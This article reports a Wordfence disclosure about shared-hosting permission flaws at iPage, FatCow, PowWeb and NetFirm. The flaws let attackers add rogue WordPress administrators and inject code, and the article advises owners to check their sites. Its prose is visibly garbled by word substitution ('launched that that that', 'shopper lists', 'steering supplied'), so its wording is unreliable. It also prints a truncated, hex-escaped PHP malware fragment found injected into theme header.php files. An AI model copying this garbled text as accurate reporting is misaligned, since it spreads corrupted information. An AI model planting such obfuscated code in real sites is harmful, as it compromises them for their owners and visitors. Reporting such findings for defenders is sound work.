Web Host Vulnerability Discovered at iPage, FatCow, PowWeb, and NetFirm

WordFence launched that that that they had discovered a vulnerability at 4 web internet hosting firms. WordFence warns that whereas the vulnerability was patched, it’s potential web sites have been hacked earlier to the restore.

Server settings allowed hackers to create WordPress administrator accounts from which the web sites is perhaps exploited with rogue code added to the WordPress theme.

WordFence urged website administrators to look at their web sites for rogue administrator accounts in the event that they’re hosted on iPage, FatCow, PowWeb, or NetFirm. All 4 are owned by the similar agency, Endurance International Group.

What Was the Server Vulnerability?

The affected servers had permission and file settings that allowed an attacker to view delicate data. Other vulnerabilities allowed the attackers to entry the database, add themselves as an administrators then take over the situation.

This is how WordFence described the vulnerability:

“Four conditions existed that contributed to this vulnerability:

1. Customer files are all stored on a shared file system.

2. The full path to a user’s web root directory was public or could be guessed.

3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).

4. An attacker could cause a program running in the group www to read files in arbitrary locations.”

Sites Could be Infected

WordFence warned that there was a timeframe sooner than the vulnerability was fixed all through which web websites hosted on these 4 host suppliers could have been contaminated.

It is helpful that website owners study their shopper lists to make sure there are not any unauthorized administrators. If your website has been affected, then there should be rogue code that was added to the theme.

Here is how WordFence described the rogue code:

“If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:

<?php ${“x47x4cx4fx42x41x4cx53”}[“ddx70x68zx67x64gx”]=”slx77kx77i”;${“x47x4cOx42x41Lx53”}[“cx7ax66x6dubkdox6ax78″]=”x6cx6fx63x61tx69x6fn”;${“x47x4cx4fBx41LS”}[“x67x64x64ex74x62px75fx65i”]=”x68tx6dx6c”;${“x47x4cOBx41x4cS”}[“x77ix64x68x6bvx6da”]=”x73tx72x66″;${“x47x4cx4fx42x41x4cx53”}[“x66sx75x71x79x6evw”]=”bx6fx74″;${“x47x4cOBALx53”}[“wx6cx79x63x61x76x62x71x68x6fx6cx75″]=”cacx68x65”;${“Gx4cOx42x41Lx53”}[“ryx68x72kux6b”]=”x73x63hx65x6dx65″;${“x47x4cx4fx42x41Lx53”}[“x74x6ax6bcx64ex65x69w”]=”x73lx77kx77ix32″;${“Gx4cOBAx4cS”}[“x79x65x64x73x67x6ahx69x73x67″]=”x73x6cx74lx65x69lx73″;”

Vulnerability Has Been Fixed

WordFence disclosed the vulnerability to the web internet hosting firms sooner than making a public announcement. The web internet hosting firms promptly fixed the vulnerabilities.

Nevertheless, consistent with the steering supplied by WordFence, chances are high you may wish to study your shopper lists for rogue admin stage accounts and overview your header.php file for rogue code.

Read the entire announcement at the WordFence weblog

Images by Shutterstock, Modified by Author

Tags: , , , , , , ,